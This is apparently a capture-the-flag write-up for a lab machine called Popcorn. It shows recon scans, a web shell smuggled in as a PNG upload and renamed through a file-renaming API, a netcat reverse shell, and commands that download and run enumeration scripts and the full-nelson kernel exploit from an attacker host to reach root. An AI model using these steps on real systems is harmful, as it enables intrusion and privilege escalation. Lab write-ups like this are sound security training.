Popcorn
Introduction:
Recon
1# nmap -sS -sV -sC -Pn -T4 -oN popcorn.nmap.txt 10.10.10.6
2Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
3Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 19:58 EST
4Nmap scan report for 10.10.10.6
5Host is up (0.024s latency).
6Not shown: 998 closed ports
7PORT STATE SERVICE VERSION
822/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
9| ssh-hostkey:
10| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
11|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
1280/tcp open http Apache httpd 2.2.12 ((Ubuntu))
13|_http-server-header: Apache/2.2.12 (Ubuntu)
14|_http-title: Site doesn't have a title (text/html).
15Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
16
17Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
18Nmap done: 1 IP address (1 host up) scanned in 28.80 seconds
19
1------------------------------------------------------------
2Enter your target IP address or URL here: 10.10.10.6
3------------------------------------------------------------
4Scanning target 10.10.10.6
5Time started: 2020-12-16 19:58:42.274228
6------------------------------------------------------------
7Port 22 is open
8Port 80 is open
9Port scan completed in 0:00:33.653293
Enumeration
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.6 -x php,txt
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.10.6 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,txt [+] Timeout: 10s
2020/12/16 23:16:40 Starting gobuster
/index (Status: 200) /test (Status: 200) /test.php (Status: 200) /torrent (Status: 301) /rename (Status: 301) [ERROR] 2020/12/16 23:25:05 [!] Get http://10.10.10.6/server-status: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
PHP Version 5.2.10-2ubuntu6.10 Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
Exploitation
$ hexeditor shell.png -b
http://10.10.10.6/rename/index.php?filename=/var/www/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.png&newfilename=/var/www/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php
$ nc -lvnp 4444 listening on [any] 4444 … connect to [10.10.14.25] from (UNKNOWN) [10.10.10.6] 49744 Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux 05:18:21 up 54 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: can’t access tty; job control turned off $ python -c ‘import pty; pty.spawn("/bin/bash");’ www-data@popcorn:/$ whoami whoami www-data www-data@popcorn:/$
Post-exploit/PrivEsc
1www-data@popcorn:/$ cat /etc/passwd
2cat /etc/passwd
3root:x:0:0:root:/root:/bin/bash
4daemon:x:1:1:daemon:/usr/sbin:/bin/sh
5bin:x:2:2:bin:/bin:/bin/sh
6sys:x:3:3:sys:/dev:/bin/sh
7sync:x:4:65534:sync:/bin:/bin/sync
8games:x:5:60:games:/usr/games:/bin/sh
9man:x:6:12:man:/var/cache/man:/bin/sh
10lp:x:7:7:lp:/var/spool/lpd:/bin/sh
11mail:x:8:8:mail:/var/mail:/bin/sh
12news:x:9:9:news:/var/spool/news:/bin/sh
13uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
14proxy:x:13:13:proxy:/bin:/bin/sh
15www-data:x:33:33:www-data:/var/www:/bin/sh
16backup:x:34:34:backup:/var/backups:/bin/sh
17list:x:38:38:Mailing List Manager:/var/list:/bin/sh
18irc:x:39:39:ircd:/var/run/ircd:/bin/sh
19gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
20nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
21libuuid:x:100:101::/var/lib/libuuid:/bin/sh
22syslog:x:101:103::/home/syslog:/bin/false
23landscape:x:102:105::/var/lib/landscape:/bin/false
24sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
25george:x:1000:1000:George Papagiannopoulos,,,:/home/george:/bin/bash
26mysql:x:104:113:MySQL Server,,,:/var/lib/mysql:/bin/false
27
1bash: cd: HOME not set
2www-data@popcorn:/$ ls
3ls
4bin dev initrd.img media proc selinux tmp vmlinuz
5boot etc lib mnt root srv usr
6cdrom home lost+found opt sbin sys var
7www-data@popcorn:/$ cd /home/
8cd /home/
9www-data@popcorn:/home$ ls
10ls
11george
12www-data@popcorn:/home$ cd george
13cd george
14www-data@popcorn:/home/george$ ls
15ls
16torrenthoster.zip user.txt
17www-data@popcorn:/home/george$ cat user.txt
18cat user.txt
1968000ffd4f2e970895848c96db8d2b5c
20www-data@popcorn:/home/george$
21
22
Download Linpeas
1www-data@popcorn:/tmp$ wget http://10.10.14.25:8000/linpeas.sh
2wget http://10.10.14.25:8000/linpeas.sh
3--2020-12-18 05:25:11-- http://10.10.14.25:8000/linpeas.sh
4Connecting to 10.10.14.25:8000... connected.
5HTTP request sent, awaiting response... 200 OK
6Length: 300193 (293K) [text/x-sh]
7Saving to: `linpeas.sh'
8
9100%[======================================>] 300,193 --.-K/s in 0.09s
10
112020-12-18 05:25:11 (3.34 MB/s) - `linpeas.sh' saved [300193/300193]
12
13www-data@popcorn:/tmp$ chmod 755 linpeas.sh
14chmod 755 linpeas.sh
15www-data@popcorn:/tmp$ ./linpeas.sh
16./linpeas.sh
17
Findings
$CFG->host = “localhost”; $CFG->dbName = “torrenthoster”; //db name $CFG->dbUserName = “torrent”; //db username $CFG->dbPassword = “SuperSecret!!"; //db password
[+] Files inside others home (limit 20) /home/george/.bash_logout /home/george/.bashrc /home/george/torrenthoster.zip /home/george/.cache/motd.legal-displayed /home/george/.sudo_as_admin_successful /home/george/user.txt /home/george/.nano_history /home/george/.mysql_history /home/george/.profile
-rw-r–r– 1 george george 3180 Mar 17 2017 /home/george/.bashrc -rw-r–r– 1 george george 675 Mar 17 2017 /home/george/.profile
-rw-r–r– 1 root root 0 Mar 17 2017 /etc/apache2/httpd.conf
-rwsr-xr-x 2 root root 121K Jun 22 2009 /usr/bin/sudoedit —> Sudo/SudoEdit_1.6.9p21/1.7.2p4/(RHEL_5/6/7/Ubuntu)/Sudo<=1.8.14
www-data@popcorn:/tmp$ wget http://10.10.14.25:8000/les.sh wget http://10.10.14.25:8000/les.sh –2020-12-18 05:55:54– http://10.10.14.25:8000/les.sh Connecting to 10.10.14.25:8000… connected. HTTP request sent, awaiting response… 200 OK Length: 85113 (83K) [text/x-sh] Saving to: `les.sh'
100%[======================================>] 85,113 –.-K/s in 0.05s
2020-12-18 05:55:54 (1.79 MB/s) - `les.sh' saved [85113/85113]
www-data@popcorn:/tmp$ chmod 755 les.sh chmod 755 les.sh www-data@popcorn:/tmp$ ./les.sh ./les.sh
Available information:
Kernel version: 2.6.31 Architecture: i686 Distribution: ubuntu Distribution version: 9.10 Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS
Searching among:
74 kernel space exploits 45 user space exploits
Possible Exploits:
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c Exposure: highly probable Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server} Download URL: http://vulnfactory.org/exploits/full-nelson.c
www-data@popcorn:/tmp$ wget http://10.10.10.6:8000/nelson.c wget http://10.10.10.6:8000/nelson.c –2020-12-18 05:59:35– http://10.10.10.6:8000/nelson.c Connecting to 10.10.10.6:8000… failed: Connection refused. www-data@popcorn:/tmp$ http://10.10.14.25:8000/nelson.c http://10.10.14.25:8000/nelson.c bash: http://10.10.14.25:8000/nelson.c: No such file or directory www-data@popcorn:/tmp$ wget http://10.10.14.25:8000/nelson.c wget http://10.10.14.25:8000/nelson.c –2020-12-18 05:59:57– http://10.10.14.25:8000/nelson.c Connecting to 10.10.14.25:8000… connected. HTTP request sent, awaiting response… 200 OK Length: 9487 (9.3K) [text/plain] Saving to: `nelson.c'
100%[======================================>] 9,487 –.-K/s in 0.01s
2020-12-18 05:59:57 (655 KB/s) - `nelson.c' saved [9487/9487]
www-data@popcorn:/tmp$ gcc nelson.c -o full-nelson gcc nelson.c -o full-nelson www-data@popcorn:/tmp$ ./full-nelson ./full-nelson [] Resolving kernel addresses… [+] Resolved econet_ioctl to 0xf8414280 [+] Resolved econet_ops to 0xf8414360 [+] Resolved commit_creds to 0xc01645d0 [+] Resolved prepare_kernel_cred to 0xc01647d0 [] Calculating target… [] Triggering payload… [] Got root!
cd /root
cd /root
ls
ls root.txt
cat root.txt
cat root.txt eb82XXXXXXXXXXXXXXXXXXXX6890
Notes: